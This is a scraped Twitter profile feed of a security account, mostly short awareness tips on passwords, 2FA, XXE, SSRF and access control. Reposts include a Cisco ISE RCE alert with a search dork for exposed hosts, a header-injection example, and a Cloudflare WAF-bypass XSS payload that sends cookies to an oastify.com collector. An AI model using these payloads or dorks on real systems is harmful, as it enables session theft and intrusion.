Anonymode (@anonymode1) 's Twitter Profile
Anonymode

@anonymode1

RedTeamer || Hacker @anonysec_

ID: 1320236178436739074

linkhttp://linktr.ee/anonymode calendar_today25-10-2020 05:30:22

3,3K Tweet

3,3K Followers

3,3K Following

Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

🚨CVE-2025-20281 & CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC • CVSS: 10 • ZoomEye Dork: app="Cisco ISE" • Results: 1,937 • Advisory: github.com/advisories/GHS… • PoC: github.com/abrewer251/CVE… • ZoomEye Search: zoomeye.ai/searchResult?q…

🚨CVE-2025-20281 & CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC

• CVSS: 10
• ZoomEye Dork: app="Cisco ISE"
• Results: 1,937
• Advisory:
github.com/advisories/GHS…

• PoC: github.com/abrewer251/CVE…

• ZoomEye Search: zoomeye.ai/searchResult?q…
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups) 's Twitter Profile Photo

Authentication Bypass via Email Domain Suffix Manipulation bishal0x01.medium.com/authentication… #bugbounty #bugbountytips #bugbountytip

Anonymode (@anonymode1) 's Twitter Profile Photo

Stay alert online. 🧠💥 ✅ Use strong passwords ✅ Enable 2FA ✅ Don’t click suspicious links 🛡️ YOU are your first line of defense. #CyberSecurity #InfoSec #CyberAware #Anonysec

Stay alert online. 🧠💥
✅ Use strong passwords
✅ Enable 2FA
✅ Don’t click suspicious links
🛡️ YOU are your first line of defense.

#CyberSecurity #InfoSec #CyberAware #Anonysec
Anonymode (@anonymode1) 's Twitter Profile Photo

🚨 XXE (XML External Entity) attacks can: 🔓 Leak server files 🌐 Trigger SSRF 💣 Crash apps 🛡 Mitigate by disabling DTDs + using secure parsers. #XXE #CyberSecurity #BugBounty #InfoSec #Anonysec #OWASP #Hacking

🚨 XXE (XML External Entity) attacks can:
🔓 Leak server files
🌐 Trigger SSRF
💣 Crash apps

🛡 Mitigate by disabling DTDs + using secure parsers.
#XXE #CyberSecurity #BugBounty #InfoSec #Anonysec #OWASP #Hacking
Anonymode (@anonymode1) 's Twitter Profile Photo

🚨 Cyber Tip Thursday Beware of Evil Twin Wi-Fi 🧠 Fake hotspots like “Free_Airport_WiFi” can steal your data! 🛡 Stay safe: – Use VPN – Don’t auto-connect – Confirm Wi-Fi names #CyberSecurity #Anonysec #HackAware #WiFiHack

🚨 Cyber Tip Thursday
Beware of Evil Twin Wi-Fi 🧠
Fake hotspots like “Free_Airport_WiFi” can steal your data!

🛡 Stay safe:
– Use VPN
– Don’t auto-connect
– Confirm Wi-Fi names

#CyberSecurity #Anonysec #HackAware #WiFiHack
N$ (@nav1n0x) 's Twitter Profile Photo

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty
Anonymode (@anonymode1) 's Twitter Profile Photo

🔐 Cyber Tip Friday Stop saving passwords in browsers! ⚠️ Hackers & malware can steal them. ✅ Use a password manager ✅ Enable 2FA

🔐 Cyber Tip Friday Stop saving passwords in browsers! ⚠️ Hackers & malware can steal them. ✅ Use a password manager ✅ Enable 2FA
Anonymode (@anonymode1) 's Twitter Profile Photo

Server-side vulnerabilities are silent killers. They let hackers bypass logic, exploit APIs, & steal data from the backend. Always validate inputs server-side, not just on the frontend.

Anonymode (@anonymode1) 's Twitter Profile Photo

There's a difference between a hacker and a criminal. 🔸 Ethical hackers protect systems 🔸 Black hats exploit them 🔸 Grey hats walk the line 💡 Learn the rules, master the tools, and hack for good. The digital world needs defenders, not destroyers

Anonymode (@anonymode1) 's Twitter Profile Photo

SSRF (Server-Side Request Forgery) lets attackers trick a server into making requests to internal or external systems. ⚠️ Can expose internal data & services. 🛡️ Always validate user-supplied URLs. #SSRF #CyberSecurity #BugBounty

Anonymode (@anonymode1) 's Twitter Profile Photo

🚨 File Upload Vulnerability 🚨 When users can upload files without proper validation, attackers can upload malicious scripts (e.g., .php, .jsp) and gain server access. #BugBounty #CyberSecurity #WebSec

Anonymode (@anonymode1) 's Twitter Profile Photo

🚨 Broken Access Control 🛑 Attackers can bypass permissions & access data they're not supposed to—like becoming admin without logging in as one! 😱 🔓 Always enforce proper access checks on every request. #CyberSecurity #OWASP #Hacking #BugBounty #InfoSec #Anonymode

NullSecX (@nullsecurityx) 's Twitter Profile Photo

🧠 HTTP Header Injection → Redirect Abuse 1️⃣ App reflects user input in headers: Location: https://site/./com/welcome?user=$input 2️⃣ Attacker injects \nSet-Cookie: admin=true 3️⃣ Header split → response poisoning 🎯 Leads to auth bypass or cache poisoning #bugbounty #owasp

🧠 HTTP Header Injection → Redirect Abuse
1️⃣ App reflects user input in headers:
Location: https://site/./com/welcome?user=$input
2️⃣ Attacker injects \nSet-Cookie: admin=true
3️⃣ Header split → response poisoning
🎯 Leads to auth bypass or cache poisoning
#bugbounty #owasp
Anonymode (@anonymode1) 's Twitter Profile Photo

💡Cybersecurity isn’t just about strong passwords — it’s about securing the WHOLE attack surface. #CyberSecurity #BugBounty #InfoSec #Hacking #RedTeam #Anonysec

Anonymode (@anonymode1) 's Twitter Profile Photo

Did you know? Most hackers don't “hack” — they just log in. Here’s how: 🕵️‍♂️ They scrape public data 🌐 They find exposed subdomains 📁 They analyze JavaScript for secrets 🧪 They test parameters for hidden functions.. you are pawned!!!